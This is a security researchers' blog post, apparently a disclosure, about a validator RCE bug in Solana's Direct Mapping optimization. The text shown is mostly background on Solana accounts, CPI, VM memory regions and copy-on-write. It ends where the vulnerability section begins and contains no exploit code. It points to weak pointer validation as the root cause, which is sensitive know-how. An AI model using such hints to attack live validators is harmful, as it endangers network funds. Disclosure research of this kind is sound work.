
Pwning Solana for Fun and Profit - Exploiting a Subtle Rust Bug for Validator RCE and Money-Printing

by anatomist

The Road to RCE

In this blog, we examine the Direct Mapping optimization first introduced in Solana version 1.16. Our research revealed a critical vulnerability caused by an oversight in pointer management, ultimately allowing us to achieve full remote code execution (RCE) on a validator node. This feature was never enabled on mainnet, but had this flaw gone unpatched, it could have compromised the entire Solana network—putting what is today over $9 billion in total value locked (TVL) at risk.

In addition to diving into the vulnerability details, we also want to demystify the bug-hunting process in this blog. As fascinating as it is to read about all the astonishing findings published by security researchers, rarely do we get a glimpse of the thought process behind them. The path to discovering a critical bug is often marked by dead ends, intuition, curiosity, and deep knowledge of system internals. By walking through our initial observations and how we narrowed them down to the actual vulnerability, we hope to shed light on what real-world vulnerability research looks like.

Before we start, if you're primarily interested in the technical discussions, skip ahead to the Setting the Stage: A Primer on Solana's Execution Environment section, where we discuss the background knowledge required to understand the bug. If you know your way around Solana internals and just want to read about the bug, you can jump directly to The Vulnerability section. Otherwise, sit back and join us as we revisit this rollercoaster of a journey. :)

Very Long Story, Hopefully Short Enough

Many blockchains have embraced modern programming languages like Rust and Go, which are often seen as safer alternatives to lower-level options like C or C++. While language choice is sometimes a matter of taste, it significantly shapes a protocol’s security profile. Solana uses Rust, a language renowned for memory safety and object lifetime management.

But of course, no software is impenetrable. Even before we discovered the RCE vulnerability, our dissection of Solana had already uncovered several validator mismatch bugs that could compromise the chain's liveness. These ranged from non-deterministic execution across multiple validators to misconfigurations in feature gating that led to unsynchronized upgrades, all of which indicate that Solana isn't bulletproof.

Most of the bugs we previously found lean more toward the business logic side. After finding several of these, we were no longer satisfied with unveiling just another business logic bug. We wanted something deeper, something buried deep in Solana's system internals—the kind you uncover only through the most meticulous anatomy.

One target we set our sights on was the removal of memory address translation, which seemed like a powerful but extremely dangerous optimization. Unfortunately, this feature never materialized.

While keeping watch on the address translation feature, we started exploring adjacent parts of the codebase. It wasn't long before we stumbled upon another interesting feature called Direct Mapping. And it was in this feature that we discovered the kind of vulnerability we were looking for, one with the potential to compromise the entire blockchain.

As you might already know, every performance optimization carries the risk of introducing vulnerabilities. The intuitive way to manage VM memory is to isolate it completely from the host running it. This ensures safety but sometimes introduces performance hits. Attempting to eliminate this isolation for speed, while still maintaining security, is ambitious and inherently risky.

Solana began addressing this overhead with Direct Mapping. The cost is especially pronounced during Cross-Program Invocations (CPI), when programs must serialize and copy large amounts of account data, incurring significant execution overhead. The Direct Mapping mechanism introduced in Solana v1.16 aimed to eliminate this unnecessary copying: account data buffers are mapped directly into VM memory and the pointers are updated dynamically, rather than copying the entire data. However, the optimization requires strict runtime validation of pointers during these dynamic updates, and this validation was inadequately implemented, ultimately introducing the vulnerability.

The vulnerability was powerful, but unfortunately, our exploit hit an unexpected wall thanks to an unrelated patch. After some hard work navigating the new limitations, we ultimately managed to craft a working exploit. Now, if you're ready, let's dive into the technical details.

Setting the Stage: A Primer on Solana's Execution Environment

To analyze the security of a system, we first need to understand how it works. Solana is heavily optimized for performance, more specifically parallel execution of transactions, and requires extra care to prevent race conditions or non-determinism issues that may lead to liveness failures. This results in an object-oriented design that incorporates Solana's unique data storage and transaction models.

The Solana Account Model

In Solana, everything is stored in what are called Accounts. You can think of the entire state of the Solana blockchain as a giant key-value store, where the "key" is an Address (a Pubkey) and the "value" is the account data itself.

An Account holds several pieces of information; most importantly, it tracks the amount of native tokens the account holds (lamports), the owner of the account, and an opaque data field.

pub struct Account {
    pub lamports: u64,     // Native token balance
    pub data: Vec<u8>,     // Variable-length state data
    pub owner: Pubkey,     // Program authorized to modify this account
    pub executable: bool,  // Whether this account contains executable code
    pub rent_epoch: Epoch, // Rent tracking information
}

The data field is where the magic happens. For a simple wallet account, this might be empty. But for an account owned by a program, this byte array holds all of its state. The structure of this data is defined by each program. This data field is the central component of our story.

Transaction and Instruction Flow

To take full advantage of storing all data as Accounts, a Solana Transaction specifies upfront which accounts it intends to access, as well as how it intends to access them (read-only or read + write). This allows validators to check whether different transactions have overlapping storage access and decide whether it is safe to schedule those transactions for parallel execution.

A Transaction can also include multiple Instructions, each of which is a contract call. This gives users a scripting capability to perform complex operations in a single transaction. The Instructions in a Transaction are executed sequentially and atomically.

pub struct Transaction {
    pub signatures: Vec<Signature>,
    pub message: Message,
}

pub struct Message {
    pub header: MessageHeader,                  // Access type (read / write) of each accessed account
    pub account_keys: Vec<Pubkey>,              // Accounts accessed by the transaction
    pub instructions: Vec<CompiledInstruction>, // Actions performed by the transaction
    ...
}

pub struct MessageHeader {
    pub num_required_signatures: u8,
    pub num_readonly_signed_accounts: u8,
    pub num_readonly_unsigned_accounts: u8,
}

pub struct Instruction {
    pub program_id: Pubkey,         // Program to execute
    pub accounts: Vec<AccountMeta>, // Accounts this instruction will access
    pub data: Vec<u8>,              // Instruction-specific data
}
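To make the scripting capability concrete, here is a rough client-side sketch, assuming the standard solana_sdk crate; the payer keypair, recipient pubkeys, and recent blockhash are placeholders that would normally come from a wallet and an RPC client. It packs two transfers into one Transaction, which then executes sequentially and atomically:

use solana_sdk::{
    hash::Hash,
    pubkey::Pubkey,
    signature::{Keypair, Signer},
    system_instruction,
    transaction::Transaction,
};

// Illustrative sketch: `payer`, the recipient pubkeys, and `recent_blockhash`
// are assumptions for the example, not values from this article.
fn build_batched_transfer(
    payer: &Keypair,
    alice: &Pubkey,
    bob: &Pubkey,
    recent_blockhash: Hash,
) -> Transaction {
    // Two Instructions packed into one Transaction; the Message header records
    // each account's access type so validators can schedule execution safely.
    let ix1 = system_instruction::transfer(&payer.pubkey(), alice, 1_000_000);
    let ix2 = system_instruction::transfer(&payer.pubkey(), bob, 2_000_000);

    Transaction::new_signed_with_payer(
        &[ix1, ix2],
        Some(&payer.pubkey()),
        &[payer],
        recent_blockhash,
    )
}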

The rBPF Virtual Machine

Solana programs are typically written in Rust and compiled to a variant of eBPF (extended Berkeley Packet Filter) bytecode. The validator executes this bytecode within a sandboxed virtual machine.

For each transaction, the validator allocates a dedicated, isolated memory space for the VM. The virtual address memory map used by Solana SBF programs is fixed and laid out as follows:

0x100000000 - CODE  : Program executable bytecode
0x200000000 - STACK : Call stack (4KB frames)
0x300000000 - HEAP  : Dynamic memory (32KB region)
0x400000000 - INPUT : Program input parameters & serialized account data

Within the VM, during execution, programs can modify their own memory however they want without affecting the memory stored on the host. All validation is performed after program execution completes.

The Legacy Model: Single Program Execution (~v1.14.x)

Let's first understand how a simple program execution flows in the legacy model. This process involves four main phases: loading accounts from the database, executing bytecode in the rBPF VM, validating changes to guarantee integrity, and committing the results to storage.

Single Program Memory Layout

As shown in the diagram above, the legacy model serializes all account data into a contiguous INPUT region. Here's how this process works:

Phase 1: Loading and Serializing Accounts

The host and VM operate in completely isolated environments; they can't share objects or pointers directly. All account data must cross this boundary through serialization and deserialization, creating a controlled interface between the trusted host and the sandboxed VM.

The validator loads all requested accounts from the database and serializes them into a binary blob that gets copied into the INPUT region at 0x400000000. Once inside the VM, a program usually starts its bootstrap routine by deserializing the raw serialized Accounts into AccountInfo structures. These AccountInfo structures are stored in the VM's heap memory before control is handed to the program entrypoint function:

// How programs reconstruct AccountInfo from the serialized data
pub struct AccountInfo<'a> {
    pub key: &'a Pubkey,
    pub lamports: Rc<RefCell<&'a mut u64>>,
    pub data: Rc<RefCell<&'a mut [u8]>>, // Points directly into INPUT region!
    pub owner: &'a Pubkey,
    pub rent_epoch: Epoch,
    pub is_signer: bool,
    pub is_writable: bool,
    pub executable: bool,
}

AccountInfo.data points directly into the serialized representation within the INPUT region. For instance, if a program writes account.data.borrow_mut()[0] = 42, it's modifying the serialized data in VM memory.

Programs can interact directly with the serialized bytes. Parsing serialized accounts into AccountInfo is just what the Solana program SDK does to make life easier for developers.
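For illustration, here is a minimal sketch of such a program, assuming the usual solana_program SDK boilerplate; the write below lands directly in the serialized bytes of the INPUT region and only persists if post-execution validation passes:

use solana_program::{
    account_info::AccountInfo,
    entrypoint,
    entrypoint::ProgramResult,
    program_error::ProgramError,
    pubkey::Pubkey,
};

entrypoint!(process_instruction);

// Minimal sketch: the account is assumed to be writable, non-empty, and owned
// by this program, otherwise the write will be rejected (or panic) later.
pub fn process_instruction(
    _program_id: &Pubkey,
    accounts: &[AccountInfo],
    _instruction_data: &[u8],
) -> ProgramResult {
    let account = accounts.first().ok_or(ProgramError::NotEnoughAccountKeys)?;

    // This write modifies the serialized account data in VM memory at
    // 0x400000000+; it only becomes real state once validation succeeds.
    account.data.borrow_mut()[0] = 42;

    Ok(())
}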

Phase 2: Program Execution

Once the accounts are serialized and loaded into the INPUT region, the rBPF VM executes the program bytecode. The program has absolute control over its virtual memory space. It can overwrite account balances, change ownership, modify data, even corrupt the entire memory space. This design choice allows for maximum performance during execution, with security enforcement deferred to the validation phase.

Phase 3: Post-Execution Validation

After the program finishes execution, the validator validates every change made during execution. It doesn't trust anything that happened during execution. Instead, it carefully checks every modification to ensure no rules were broken and no money was stolen.

Validation rules ensure state consistency and permission enforcement before persisting account state updates to storage:

  • Account fields modifiable only if the account is marked writable in the Transaction and Instruction.
  • Only the account owner modifies owner and data.
  • Owner modifiable only when data is zeroed.
  • Lamports can be increased by anyone but decreased only by the owner.
  • Total lamports remains consistent across transaction execution.
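To make these rules concrete, here is a simplified sketch of what the per-account checks amount to. This is illustrative only, not Solana's actual implementation; the snapshot type and the two flags are invented for the example:

// Toy pre/post snapshot of a single account's state.
struct AccountSnapshot {
    lamports: u64,
    data: Vec<u8>,
    owner: [u8; 32],
}

fn validate_account_change(
    pre: &AccountSnapshot,
    post: &AccountSnapshot,
    is_writable: bool,      // marked writable in the Transaction / Instruction
    program_is_owner: bool, // the executing program owns this account
) -> Result<(), &'static str> {
    let changed =
        pre.lamports != post.lamports || pre.data != post.data || pre.owner != post.owner;

    // Any change at all requires the account to be marked writable.
    if changed && !is_writable {
        return Err("account not writable");
    }
    // Only the owning program may touch data or reassign ownership.
    if (pre.data != post.data || pre.owner != post.owner) && !program_is_owner {
        return Err("only the owner may modify data/owner");
    }
    // Ownership may only be transferred while the data is zeroed.
    if pre.owner != post.owner && !post.data.iter().all(|&b| b == 0) {
        return Err("owner change requires zeroed data");
    }
    // Lamports may be increased by anyone, but decreased only by the owner.
    if post.lamports < pre.lamports && !program_is_owner {
        return Err("only the owner may debit lamports");
    }
    Ok(())
}

// The remaining rule is transaction-wide rather than per-account:
// the sum of lamports before execution must equal the sum afterward.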

Phase 4: Final Commit

After all validation rules pass, the modified account states are committed back to the database. All changes made during program execution are now persisted and the transaction is confirmed. If any validation rule fails, the entire transaction is rejected and no changes are stored.

Sounds simple, right?

When Programs Need to Talk: Cross-Program Invocation (v1.14.x)

But what happens when programs need to invoke each other, for instance, when your dex program needs to call the token program to transfer tokens? This is where Cross-Program Invocation (CPI) comes in, and where the elegant simplicity of single program execution starts to break down.

The challenge is that each program runs in its own isolated VM with its own memory space. When Program A calls Program B, they can't simply share pointers or objects. Account data must be carefully marshaled between these isolated environments while maintaining security and consistency.

TransactionContext: Shared Account Cache

This brings us to a detail we omitted up till now. Since a Transaction is atomic and may include multiple Instructions, there must be a way to cache the intermediate execution results of earlier Instructions before later Instructions finish. This cache is crucial, since we can't allow the effects of earlier Instructions to persist if a later Instruction reverts.

To this end, Solana introduces the TransactionContext structure for state caching. The TransactionContext contains AccountSharedData structures, which hold changes to accounts before the runtime either commits the changes to permanent storage or reverts them later.

pub struct TransactionContext {
    account_keys: Pin<Box<[Pubkey]>>,           // All account addresses in transaction
    accounts: Arc<TransactionAccounts>,         // Shared account data cache
    instruction_stack: Vec<InstructionContext>, // CPI call stack
    ...
}

pub struct TransactionAccounts {
    accounts: Vec<RefCell<AccountSharedData>>, // Mutable account data
    ...
}

// Shared account data that persists across CPI boundaries
pub struct AccountSharedData {
    lamports: u64,
    data: Arc<Vec<u8>>, // Thread-safe shared data buffer
    owner: Pubkey,
    ...
}

Handling CPI is somewhat similar to handling multiple Instructions, so the same TransactionContext can be repurposed to pass information between programs.

On CPI calls and returns, the latest account states must be exposed from the invoking side to the receiving side of the CPI. The Solana runtime does this by first validating the latest changes to the accounts and committing them into the TransactionContext, then passing the accounts in the TransactionContext into the other VM.

CPI Call Process

CPI Call

The TransactionContext we described earlier lives on the host and serves as the bridge between two isolated VMs. When Program A calls Program B, each program runs in its own separate VM with isolated memory spaces, but they share account state through the host-side TransactionContext. Here's what happens:

Step 1: Instruction Crafting

Program A constructs a CPI instruction specifying the callee's program ID and metadata of accounts involved. This includes each account's address, whether the account's owner has signed the instruction, and whether the account should be writable.

Step 2: Load Account Data

The runtime creates CallerAccount structures by resolving AccountInfo structures from Program A's VM memory. These CallerAccount structures hold mutable references pointing directly into Program A's serialized account data, and will be used later during CPI return to efficiently update the caller's state.

// Resolved view of AccountInfo with direct field access
struct CallerAccount<'a> {
    lamports: &'a mut u64,         // Direct mutable reference to lamports
    owner: &'a mut Pubkey,         // Direct mutable reference to owner
    original_data_len: usize,      // Track size changes for realloc handling
    serialized_data: &'a mut [u8], // Points to serialized data in VM
    vm_data_addr: u64,             // VM address of AccountInfo.data pointer
    ref_to_len_in_vm: &'a mut u64, // VM address of AccountInfo.data length
    serialized_len_ptr: *mut u64,
    executable: bool,
    rent_epoch: u64,
}

When Program B finishes execution, the runtime uses these mutable references to directly update Program A's VM memory without additional lookup.

Step 3: Validation and Cache Update

Before handing control to Program B, the runtime validates everything Program A has done so far, similar to the validation phase in single program execution. Only after validation passes are Program A's changes written to the shared cache. This ensures that the AccountSharedData always holds valid account state, so each program in the call chain sees only validated changes from previous programs.

Step 4: Serialization to Callee VM

Program B gets its own fresh VM with a new INPUT region. All account data from the shared cache gets serialized and copied into Program B's INPUT region, just like in single program execution. Program B can now run normally, seeing the same AccountInfo structures as if it were called directly.

CPI Return Process

CPI Return

When Program B finishes execution, the runtime must ensure all changes from Program B are valid before merging them back to Program A. Here's what happens:

Step 1: Validation and Cache Update

Program B's VM states are revalidated using the same rules as single program execution. This prevents Program B from violating ownership rules, stealing funds, or modifying read-only accounts. Only validated changes are written back to the shared cache, again, ensuring AccountSharedData always holds valid account state for subsequent programs in the call chain.

Step 2: Memory Buffer Management

Account data may grow during Program B's execution when the program calls realloc() to expand account storage. This happens when programs need to add new data fields, grow vectors, store additional state information, or allocate space for user data like NFT metadata. To handle this growth efficiently, the runtime reserves extra padding beyond the current data length when accounts are initially serialized into Program A's VM memory. This reserved space avoids expensive reallocation during execution. If Program B's growth exceeds the reserved padding, the transaction immediately reverts.
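As a concrete illustration of such growth, an on-chain program can expand an account in place as long as it stays within the permitted increase; the sketch below is hypothetical, but uses the real solana_program realloc() API and the MAX_PERMITTED_DATA_INCREASE constant:

use solana_program::{
    account_info::AccountInfo,
    entrypoint,
    entrypoint::{ProgramResult, MAX_PERMITTED_DATA_INCREASE},
    program_error::ProgramError,
    pubkey::Pubkey,
};

entrypoint!(process_instruction);

// Illustrative sketch: grow an account's data in place. Growth up to
// MAX_PERMITTED_DATA_INCREASE fits in the padding the runtime reserved
// when the account was serialized into the INPUT region, so no host-side
// buffer needs to be resized during execution.
pub fn process_instruction(
    _program_id: &Pubkey,
    accounts: &[AccountInfo],
    _instruction_data: &[u8],
) -> ProgramResult {
    let account = accounts.first().ok_or(ProgramError::NotEnoughAccountKeys)?;

    // Grow by 64 bytes, well under the permitted limit.
    let grow_by = 64usize.min(MAX_PERMITTED_DATA_INCREASE);
    account.realloc(account.data_len() + grow_by, /* zero_init */ false)?;

    Ok(())
}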

Step 3: Update Caller and Resume Execution

Validated account states from the shared cache are copied back into Program A's VM memory INPUT region. The runtime uses CallerAccount structures with their mutable references to efficiently update Program A's serialized account data.

The Performance Problem

Consider a typical DeFi swap with 4 nested program calls, each handling 10KB of account data. In the legacy model, each CPI call requires serializing this data into the callee's VM, then copying it back on return. For our 4-level call chain, this means 40KB of serialization going down and 40KB of copying back up, totaling 80KB of memory operations for a single transaction.

For a high-throughput blockchain processing thousands of complex transactions per second, this overhead becomes the performance bottleneck. Validators spent more time copying memory than executing actual program logic.

Solana needed a better runtime.

The Optimization That Broke Everything: Direct Mapping (v1.16.0)

In Solana version 1.16.0, an optimization known as Direct Mapping was introduced to address the performance issues arising from repetitive serialization and deserialization of large account data. Instead of creating separate copies of account data in the VM's INPUT region, Direct Mapping exposes the host's actual account data buffers directly to the VM, allowing programs to read and write the same memory that the host uses to store account state. This optimization is applied only to the account data field, not to other fields such as the account owner or lamports. The justification is that all the other fields are relatively small in size, so the overhead of the optimization might outweigh the performance gained; only the data field is large enough to justify such an optimization.

MemoryRegion: The Foundation of VM Address Translation

Since we're preparing to map host memory into the virtual guest memory space, it's crucial to explain how Solana manages guest virtual memory.

The VM and host operate in separate address spaces. When a program running in the VM accesses memory at address 0x400000000, this virtual address must be translated to an actual host memory location. Solana handles this translation through MemoryRegion structures:

pub struct MemoryRegion {
    pub host_addr: Cell<u64>, // start host address
    pub vm_addr: u64,         // start virtual address
    pub vm_addr_end: u64,     // end virtual address
    pub len: u64,             // Length in bytes
    pub vm_gap_shift: u8,     // Address translation parameters
    pub is_writable: bool,    // Permission tracking
}

Each MemoryRegion maps a range of VM virtual addresses to host memory addresses. When the VM accesses memory, the runtime looks up the appropriate MemoryRegion and translates the virtual address to the corresponding host address.
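Conceptually, the translation is just an offset into the host buffer plus a bounds check. The sketch below is a simplified toy version (it ignores gaps, permissions, and the CoW machinery discussed later), not the actual rbpf implementation:

// Simplified stand-in for MemoryRegion, used only for this illustration.
struct Region {
    host_addr: u64, // start host address
    vm_addr: u64,   // start virtual address
    len: u64,       // length in bytes
}

fn vm_to_host(region: &Region, vm_addr: u64, access_len: u64) -> Option<u64> {
    // The access must fall entirely inside the region's virtual range...
    let offset = vm_addr.checked_sub(region.vm_addr)?;
    if offset.checked_add(access_len)? > region.len {
        return None; // ...otherwise it's an access violation.
    }
    // ...and the host address is simply the same offset into the host buffer.
    Some(region.host_addr + offset)
}

fn main() {
    let input = Region { host_addr: 0x7f00_0000_0000, vm_addr: 0x4_0000_0000, len: 0x1000 };
    assert_eq!(vm_to_host(&input, 0x4_0000_0010, 8), Some(0x7f00_0000_0010));
    assert_eq!(vm_to_host(&input, 0x4_0000_0ffc, 8), None); // would run past the region
}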

Legacy Model: Single MemoryRegion

In the legacy model, all account data was packed into one large serialized blob in the INPUT region, managed by a single MemoryRegion:

VM Address Range: 0x400000000 - 0x400100000
Host Address: Points to serialized account data buffer
State: Writable

This single MemoryRegion contained all serialized account data in one contiguous buffer.

Legacy MemoryRegion

Direct Mapping: Multiple MemoryRegions per Account

Direct Mapping fundamentally changes this architecture. Instead of creating separate copies of account data in a serialized buffer, Direct Mapping creates an individual MemoryRegion for each account that points directly to the host's AccountSharedData buffer. When a program accesses account.data, the VM translates this access through the account's specific MemoryRegion to read or write the same memory buffer that the host uses to store the account state, eliminating the copying step entirely.

Direct Mapping MemoryRegions

The diagram above shows this architectural shift: from one large MemoryRegion containing serialized copies to multiple MemoryRegions pointing directly to host account buffers.
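Roughly, the serializer's job shifts from "copy everything into one blob" to "emit one region per account whose host_addr is the account buffer itself". The sketch below uses toy types to illustrate the idea; it glosses over the per-account metadata and growth padding present in the real layout:

// Simplified illustration, not Solana's actual serializer.
struct Region {
    host_addr: u64,
    vm_addr: u64,
    len: u64,
}

const INPUT_START: u64 = 0x4_0000_0000;

fn build_account_regions(account_buffers: &[Vec<u8>]) -> Vec<Region> {
    let mut regions = Vec::new();
    let mut vm_addr = INPUT_START;
    for buf in account_buffers {
        regions.push(Region {
            host_addr: buf.as_ptr() as u64, // the host buffer itself, no copy made
            vm_addr,
            len: buf.len() as u64,
        });
        // The real layout interleaves account metadata and growth padding;
        // here the buffers are simply placed back to back for illustration.
        vm_addr += buf.len() as u64;
    }
    regions
}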

Changes to the MemoryRegion Structure

And just like that, we've gotten rid of the need for excessive copies! Sounds too good to be true, right?

The optimization comes at a cost. Most notably, Direct Mapping breaks the fundamental execution model that Solana previously relied upon. In the legacy model, programs could freely modify their VM memory because changes only affected local copies; validation happened afterward, before committing to the host. With Direct Mapping, this approach no longer works because every VM write immediately affects the actual account state recorded in the AccountSharedData within the TransactionContext. This forces Solana to implement immediate permission validation on every memory access.

But what checks must be done? Are read and write checks sufficient? The answer, unfortunately, is no. We'll start by presenting the changes to the MemoryRegion structure, and work our way back to the reasons behind the change.

pub struct MemoryRegion {
    pub host_addr: Cell<u64>,     // start host address
    pub vm_addr: u64,             // start virtual address
    pub vm_addr_end: u64,         // end virtual address
    pub len: u64,                 // Length in bytes
    pub vm_gap_shift: u8,         // Address translation parameters
    pub state: Cell<MemoryState>, // Permission tracking
}

pub enum MemoryState {
    Readable, // The memory region is readable
    Writable, // The memory region is writable
    Cow(u64), // The memory region is writable but must be copied before writing
}

Each MemoryRegion now tracks its permission state and enforces access controls on data writes. When a program tries to write to account data, the runtime immediately checks the region's state and either allows the write, triggers a copy-on-write operation, or rejects the access entirely.

The key change is the addition of the state field that replaces the simple is_writable boolean. This allows for more sophisticated permission management, particularly the Cow(u64) state that triggers copy-on-write operations when needed.

Copy-on-Write (CoW) Strategy

Now let's start discussing why an additional copy-on-write state is required.

Avoid Authoritative Data Contamination

Aside from plain read and write authorization, Direct Mapping introduces an even greater problem: the rollback of changes when a transaction reverts. But why is this a problem? Aren't the AccountSharedData structures in the TransactionContext already a cache? This boils down to some details of TransactionContext that we omitted earlier.

When the TransactionContext and AccountSharedData are first created, AccountSharedData.data actually points to the authoritative account data in persistent storage (notice that AccountSharedData.data is an Arc<Vec<u8>>). When flushing account changes to AccountSharedData on CPI or instruction boundaries, if the data is modified, Arc::make_mut is called to create a copy of the data and avoid contaminating the authoritative copy. This is effectively a copy-on-write mechanism that spares the TransactionContext from having to clone all account data. Its effectiveness is, however, limited by the need to serialize data into the VMs.

With Direct Mapping, the serialization is removed, allowing us to fully enjoy the benefits copy-on-write brings, but it is also no longer possible to rely on calling Arc::make_mut on CPI and instruction boundaries to protect the authoritative copy. Instead, the copy-on-write mechanism needs to be inlined into the memory access checks performed at write time.

This is where the copy-on-write state comes in handy. By adding a dedicated state, Solana can differentiate between the first and subsequent writes to account data. The first write sees a MemoryRegion in the CoW state, so it makes a copy of the data buffer and updates the state. Subsequent writes then see a Writable state and know that we're already operating on a dedicated copy, with no need to worry about contaminating the authoritative data.

Buffer Reallocation Management

Naturally, with Direct Mapping enabled, we also need to handle the possibility of account data growth. A naive approach would be to resize the underlying AccountSharedData buffer whenever more space is required. This approach is inefficient, however, since each resize might trigger a realloc of the data buffer and, in turn, require a copy of the data. Frequent copies defeat the entire purpose of the Direct Mapping optimization.

Solana's approach is to instead over-reserve the reallocated buffer size. On the first copy of the data (i.e. copy-on-write), the AccountSharedData.data reserves a buffer big enough to accommodate the max account data growth allowed by a transaction. This removes the need to constantly reallocate the buffer.

Copy on Write

Summarizing these ideas, copy-on-write under Direct Mapping works as shown in the diagram above, where AccountSharedData may have its data vector cloned, and the corresponding MemoryRegion must have its host_addr updated accordingly.

For reference, the code for writing to virtual memory now looks like this, where memory access authorization is checked inline and a callback function is used to update the MemoryRegion and AccountSharedData.data for buffers in the CoW state.

pub fn create_vm<'a, 'b>(...) -> Result<EbpfVm<'a, RequisiteVerifier, InvokeContext<'b>>, Box<dyn std::error::Error>> {
    let stack_size = stack.len();
    let heap_size = heap.len();
    let accounts = Arc::clone(invoke_context.transaction_context.accounts());
    let memory_mapping = create_memory_mapping(
        ...
        regions,
        // this is the cow_cb
        Some(Box::new(move |index_in_transaction| {
            // The two calls below can't really fail. If they fail because of a bug,
            // whatever is writing will trigger an EbpfError::AccessViolation like
            // if the region was readonly, and the transaction will fail gracefully.
            let mut account = accounts
                .try_borrow_mut(index_in_transaction as IndexOfAccount)
                .map_err(|_| ())?;
            accounts
                .touch(index_in_transaction as IndexOfAccount)
                .map_err(|_| ())?;

            if account.is_shared() {
                // See BorrowedAccount::make_data_mut() as to why we reserve extra
                // MAX_PERMITTED_DATA_INCREASE bytes here.
                account.reserve(MAX_PERMITTED_DATA_INCREASE);
            }
            Ok(account.data_as_mut_slice().as_mut_ptr() as u64)
        })),
    )?;
    ...
)

fn ensure_writable_region(region: &MemoryRegion, cow_cb: &Option<MemoryCowCallback>) -> bool {
    match (region.state.get(), cow_cb) {
        (MemoryState::Writable, _) => true,
        (MemoryState::Cow(cow_id), Some(cb)) => match cb(cow_id) {
            Ok(host_addr) => {
                region.host_addr.replace(host_addr);
                region.state.replace(MemoryState::Writable);
                true
            }
            Err(_) => false,
        },
        _ => false,
    }
}

impl<'a> UnalignedMemoryMapping<'a> {
    ...
    pub fn store<T: Pod>(&self, value: T, mut vm_addr: u64, pc: usize) -> ProgramResult {
        let mut len = mem::size_of::<T>() as u64;

        let cache = unsafe { &mut *self.cache.get() };

        let mut src = &value as *const _ as *const u8;

        let mut region = match self.find_region(cache, vm_addr) {
            Some(region) if ensure_writable_region(region, &self.cow_cb) => {
                // fast path
                if let ProgramResult::Ok(host_addr) = region.vm_to_host(vm_addr, len) {
                    // Safety:
                    // vm_to_host() succeeded so we know there's enough space to
                    // store `value`
                    unsafe { ptr::write_unaligned(host_addr as *mut _, value) };
                    return ProgramResult::Ok(host_addr);
                }
                region
            }
            _ => {
                return generate_access_violation(self.config, AccessType::Store, vm_addr, len, pc)
            }
        };

        // slow path, handle writes that span multiple memory regions
        ...
    }
    ...
}

Commit Process Changes

The new CoW strategy also changes how account data is committed due to the mapping constraints:

Directly Mapped Data: The original data length portion has already been modified through direct mapping and requires no additional copying.

Growth Area Data: When programs expand account data using realloc(), the new data initially lives in the reserved buffer space within the INPUT section. Since the reserved buffer isn't mapped to host memory (we can only map the exact current data size), an additional copy operation is required to move growth data from the unmapped reserved buffer to the actual account data buffer in host memory.

This mapping constraint means that while Direct Mapping eliminates copying for existing data, growth scenarios still require copying from the unmapped reserved space.
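A rough sketch of this commit step for a single account might look like the following toy function (not the actual loader code): the mapped prefix is already up to date through Direct Mapping, and only the grown tail is copied out of the reserved area.

// Toy illustration of committing one account's data after execution.
fn commit_data(host_buf: &mut Vec<u8>, reserved_area: &[u8], original_len: usize, post_len: usize) {
    if post_len > original_len {
        // The grown tail lives in the unmapped reserved space of the INPUT
        // region and must be copied into the host-side account buffer.
        host_buf.resize(post_len, 0);
        host_buf[original_len..post_len]
            .copy_from_slice(&reserved_area[..post_len - original_len]);
    } else {
        // No growth (or a shrink) needs no copying; the mapped prefix was
        // already written in place through Direct Mapping.
        host_buf.truncate(post_len);
    }
}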

Impact on Cross-Program Invocation

With data writes handled, the next thing to understand is how CPI works under the new design.

CPI Call Process

The CPI call process remains quite similar to the original design. Most steps are unchanged:

  1. Retrieve metadata of accounts involved in the CPI instruction
  2. Look up corresponding AccountSharedData from the TransactionContext
  3. Translate guest addresses in AccountInfo into host pointers to construct CallerAccount structures
  4. Update reserved buffer and validate account changes and write them back to AccountSharedData
  5. Serialize AccountSharedData into callee program's INPUT section

A minor difference is that in step 4, before validation, instead of copying the entire account data we only copy the newly grown data that's still in the reserved buffer into the (possibly newly allocated) direct-mapped buffer; the other fields are then verified and written back into AccountSharedData.

New CPI Call

CPI Return Process

The major differences occur when returning from a CPI call. Since we're using direct mapping, Vector CoW operations might occur during nested calls, requiring us to check if the original data buffer mapping has been relocated.

  1-1. Copy data from the reserved buffer back to the directly mapped data buffer.
  1-2. Validate all account changes using the same rules as single program execution.
  2. Check if the data buffer was relocated during CoW operations; if a relocation occurred, update the parent's MemoryRegion.host_addr to reflect the change.
  3. Ensure the account data length hasn't exceeded the limits expected by the caller program.
  4. Write the consolidated account changes back into the parent program's INPUT region.

Notably, step 2 is a new action introduced by Direct Mapping. Since vector CoW operations might occur during nested calls, we must detect buffer relocations and update memory mappings to maintain consistency.

New CPI Return

The MemoryRegion Update Mechanism

When CoW operations relocate account data buffers during CPI execution, the parent program's MemoryRegions still point to the old buffer locations, so we need to update them to reflect the change. So what exactly does the update mechanism look like?

MemoryRegions manage virtual-to-host address mappings, with each region covering a non-overlapping virtual address range. When a buffer gets relocated, we need to identify which specific MemoryRegion needs updating and modify its host_addr to point to the new location.

Solana uses the vm_data_addr field stored in CallerAccount to locate the correct MemoryRegion:

  1. Locate the Target Region: Use vm_data_addr to find the MemoryRegion that maps the account's data. This address should correspond to a virtual address within one of the MemoryRegion's ranges.
  2. Compare Buffer Addresses: Check if the MemoryRegion's current host_addr matches the account's actual data buffer address in AccountSharedData. If they differ, a relocation occurred during CoW operations.
  3. Update the Mapping: Replace the MemoryRegion's host_addr with the new buffer address from AccountSharedData, ensuring future VM memory accesses resolve to the correct location.
  4. Complete the Update: After updating host_addr, when the parent program accesses memory at the same virtual address, it will now correctly resolve to the relocated buffer location.

MemoryRegion Update

This mechanism relies on an assumption: that vm_data_addr accurately identifies the correct MemoryRegion to update.

The code for finding the region that contains a specific vm_addr is shown here:

impl<'a> UnalignedMemoryMapping<'a> {
    ...
    fn find_region(&self, cache: &mut MappingCache, vm_addr: u64) -> Option<&MemoryRegion> {
        if let Some(index) = cache.find(vm_addr) {
            ...
        } else {
            let mut index = 1;
            // region_addresses is eytzinger ordered array of MemoryRegions, so we
            // do a binary search here
            while index <= self.region_addresses.len() {
                // Safety:
                // we start the search at index=1 and in the loop condition check
                // for index <= len, so bound checks can be avoided
                index = (index << 1)
                    + unsafe { *self.region_addresses.get_unchecked(index - 1) <= vm_addr }
                        as usize;
            }
            index >>= index.trailing_zeros() + 1;
            if index == 0 {
                return None;
            }
            // Safety:
            // we check for index==0 above, and by construction if we get here index
            // must be contained in region
            let region = unsafe { self.regions.get_unchecked(index - 1) };
            ...
            Some(region)
        }
    }
    ...
}

The Vulnerability

So how are MemoryRegion.host_addr updates implemented? The update_caller_account() function needs to detect when account data has been relocated due to CoW operations and update the corresponding memory regions.

